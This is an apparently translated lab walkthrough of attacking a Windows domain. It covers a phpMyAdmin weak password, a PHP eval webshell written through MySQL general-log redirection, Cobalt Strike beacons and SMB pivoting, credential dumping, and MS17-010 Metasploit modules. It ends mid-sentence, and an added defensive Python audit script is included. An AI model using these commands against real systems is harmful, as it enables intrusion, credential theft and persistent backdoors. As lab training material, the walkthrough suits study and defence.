0x00 Introduction

Previously, when I was working in a domain environment, one host in the domain had no outbound network access. At that time I used a socks proxy to forward that host's traffic through the edge host. I did not think much about it then. Afterwards I thought of setting up an environment to reproduce that situation and see whether there is a simpler way to bring a host without outbound access online.

By chance, I found that this domain environment is quite good. During the reproduction some things touched my blind spots and I learned a lot. I recorded the process specially and share it with those who want to learn how to bring a domain host without outbound access online.

0x01 Range (lab) address allocation

Intranet segment: 192.168.52.0/24

External network segment: 192.168.10.0/24

Attack machine:

kali: 192.168.10.11

Target range:

win7 (inside): 192.168.52.143

win7 (external): 192.168.10.15

Domain host:

Winserver2003:192.168.52.141

Winserver2008:192.168.52.138

Among them, win7 can communicate with both the external network and the intranet, while the hosts in the domain can only communicate within the intranet.

At the beginning the DC could not be pinged from win7; after turning off the firewall it could be pinged.

Open the phpstudy directory on the C drive to start the web service.

0x02 web server penetration

nmap port probe

nmap -sS -P0 -sV -O 192.168.10.15

Port 80 is open; accessing the web address showed that it is a PHP probe page.

Scrolling to the bottom, there is a MySQL database connection test at the bottom of the page.

The weak password root/root connects successfully.

Scan for the backend

I used the "sword" directory scanner here, but it seemed to struggle, because after I finished this range and looked online I saw that many people scanned out a CMS and also got a shell through that CMS. I won't demonstrate how to use the weak CMS password to enter the backend and write a shell; if you are interested, you can search for it yourself.

I found the phpmyadmin directory, and logging in with the weak password root/root succeeded.

The interface after logging in is as follows.

0x03 Write shell through phpmyadmin

There are two ways to write a shell through phpmyadmin.

First I tried writing directly with select ... into outfile, but the value of secure_file_priv here is NULL, so that route is not usable.

The only option is the other method: writing the shell through the general (global) log.

SHOW VARIABLES LIKE '%general%'

Checking the configuration shows that the general log is off. general_log_file returns the absolute path of the log file.

So I first turn on the general log, and then write a one-line webshell into its path.

set global general_log=on;


After turning on the general log, change its absolute path. Note the pitfall here: the path returned by the log is C:\\phpStudy\\MySQL\\data\stu1.log, but the directory served by the web server is C:\\phpStudy\\WWW, so the shell must be written into the WWW directory before it can be connected to with AntSword.

set global general_log_file='C:\\phpStudy\\WWW\\shell.php';

Here is the one-line webshell (the leading < was lost in extraction and is restored):

select '<?php eval($_POST[cmd]);'

Then connect with AntSword.

You can see that the connection is successful.
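As an added defender-side example that is not part of the original post, the following audit checks the three MySQL variables this section inspects (general_log, general_log_file, secure_file_priv) and flags the combination that turns a log write into a served PHP file; the phpStudy web root and the sample variable values are assumed from the post.

```python
import os
from typing import Dict

# Constructed sample: the variables SHOW VARIABLES returns in the post once
# the general log has been redirected into the phpStudy web root.
SAMPLE_VARS = {
    "general_log": "ON",
    "general_log_file": r"C:\phpStudy\WWW\shell.php",
    "secure_file_priv": "NULL",
}
WEB_ROOT = r"C:\phpStudy\WWW"  # web root assumed from the post's phpStudy layout


def _norm(path: str) -> str:
    """Normalise a Windows or POSIX path to lower-case forward slashes, resolving '..'."""
    return os.path.normpath(path.replace("\\", "/")).replace("\\", "/").lower()


def _under(path: str, root: str) -> bool:
    """True when path is root itself or lies below root."""
    p, r = _norm(path), _norm(root)
    return p == r or p.startswith(r.rstrip("/") + "/")


def audit_mysql_vars(variables: Dict[str, str], web_root: str) -> Dict[str, str]:
    """Return {finding_code: explanation} for settings that enable a log-to-webshell write."""
    findings: Dict[str, str] = {}
    if variables.get("general_log", "OFF").upper() == "ON":
        findings["GENERAL_LOG_ON"] = "every statement text is written to disk, attacker-supplied strings included"
    log_file = variables.get("general_log_file", "")
    if log_file and _under(log_file, web_root):
        findings["LOG_IN_WEBROOT"] = f"{log_file} is inside {web_root}; the web server will serve it"
    if log_file.lower().endswith((".php", ".phtml")):
        findings["LOG_IS_PHP"] = f"{log_file} has a PHP extension; logged text executes on request"
    # SHOW VARIABLES prints NULL when import/export is disabled (the post's case);
    # an empty string means INTO OUTFILE / LOAD DATA may touch any directory.
    if variables.get("secure_file_priv", "NULL") == "":
        findings["SECURE_FILE_PRIV_UNRESTRICTED"] = "INTO OUTFILE can write anywhere mysqld can"
    return findings


if __name__ == "__main__":
    for code, why in audit_mysql_vars(SAMPLE_VARS, WEB_ROOT).items():
        print(f"{code}: {why}")
```

Because changing general_log_file needs the SUPER privilege, the finding that matters most is the root/root database account reachable from phpmyadmin; the audit only shows what that account was then able to do.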


0x03 Intranet information collection

Check the system privileges: it is very comfortable to have administrator privileges right from the start.

ipconfig /all shows the network information: a domain environment with dual network cards.

A brief look at tasklist /svc suggested there was no antivirus software.

Since there is no antivirus, the simplest and crudest approach is to use CS to upload a Trojan exe generated by CS to the target host.

Use a scheduled task to bring it online in CS.

Successfully online.

0x04 Intranet penetration

Information collection

net view to view domain information

Use the port scan provided by CS to scan a wave of hosts.

All hosts found by the scan are as follows.

hashdump to grab a wave of hashes

logonpasswords to grab a wave of plaintext passwords

All credentials are as follows. They are redacted because the password was reset when I logged in earlier, and I set a password containing personal information.

Thoughts

I tested here: because the target hosts have no firewall enabled, the PsExec built into CS can be used to move laterally and take the domain controller and the computers in the domain. However, given that win7 has dual network cards and the other hosts in the domain cannot reach the Internet, I practise how to bring a host without outbound access online.

There are generally the following ways to bring a host online without Internet access:

Use SMB beacon

Configure a listener that goes online through an HTTP proxy

Use pystinger to build a socks4 proxy

Here I use the SMB beacon method.

SMB Beacon uses a named pipe to communicate through a parent Beacon. When two Beacons are linked, the child Beacon gets its tasks from the parent Beacon and sends its output back through it. Because linked Beacons use Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, so SMB Beacon is relatively stealthy. SMB Beacon cannot directly generate a usable payload; it can only be launched using PsExec or a Stageless Payload.

First, get a beacon on a host in the intranet, grab passwords and perform SMB injection, and obtain the administrator account password of another machine with port 445 open. If the target machine has no outbound access, SMB Beacon can bring the target host online.

1. Conditions of use

Hosts running SMB Beacon must accept connections on port 445.

Only links to Beacons managed by the same Cobalt Strike instance.

To use this beacon for lateral movement, you must have administrator rights or credentials with administrator rights on the target host.

2. How to use

(1) Create smb listener


(2) Use psexec in CS for lateral movement, selecting the existing beacon as the pivot; the credentials must be administrator, that is, have administrator privileges on the target host.

(3) The connection is successful; you can see a ∞∞ mark to the right of the host running the SMB beacon.

A machine brought online with this method relies on the machine with outbound access as an intermediary. After the host without outbound access is brought online, if the host with outbound access is disconnected, the host without outbound access will also be disconnected.

0x05 Intranet horizontal penetration

Thoughts

Use Ladon to scan the intranet for EternalBlue and find that these hosts all have MS17-010.

Several common ways of exploiting ms17010:

msf

ladon/ladon_ms17010

the exe separated from msf

the CS plugin

I have tried all of these. I won't describe each process one by one, just the results of my tests.

msf is the most stable, but it is a little troublesome to use because you need to set up the handler module and select the exploit module. ladon_ms17010 is convenient but not very stable and sometimes fails. The CS plugin is not stable, and the success rate is lower if the network is unstable or the host has no outbound access.

In this case of no outbound access, you can give priority to the exe separated from msf and ladon_ms17010. On success, a new user is created through the custom dll and added to the administrators group, port 3389 is opened, and a sticky-key backdoor is left behind.

Depending on the actual situation, you can consider logging in remotely directly in a suitable time window and looking through sensitive data, which often brings a lot of convenience to penetration because of the many "good habits" of operations staff, such as "password book.txt".

CS spawns an msf session

msf sets the listening port

Create a new listener and spawn a session to it.

Run it and get a meterpreter.

ms_17_010 to obtain domain controller privileges

Here I know the DC has the ms_17_010 vulnerability, so I first tried to exploit it with EternalBlue.

Use the following module

exploit/windows/smb/ms17_010_eternalblue

After running it, I found that the exploit was sent but no session was established.

Switch to the ms17010 psexec module

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/bind_tcp

I did not get a shell either. I did not think about it carefully at the time. Later I considered that it might be because Win7 sits in two network segments, so I could not get a shell by hitting EternalBlue directly.

Using msf to exploit ms_17_010 on a machine without outbound access

I thought of the meterpreter I had obtained for win7 earlier, so I tried adding routes.

msf is still very stable and satisfying when used on its own. After win7 was brought online in msf, we already knew in advance that there are 5
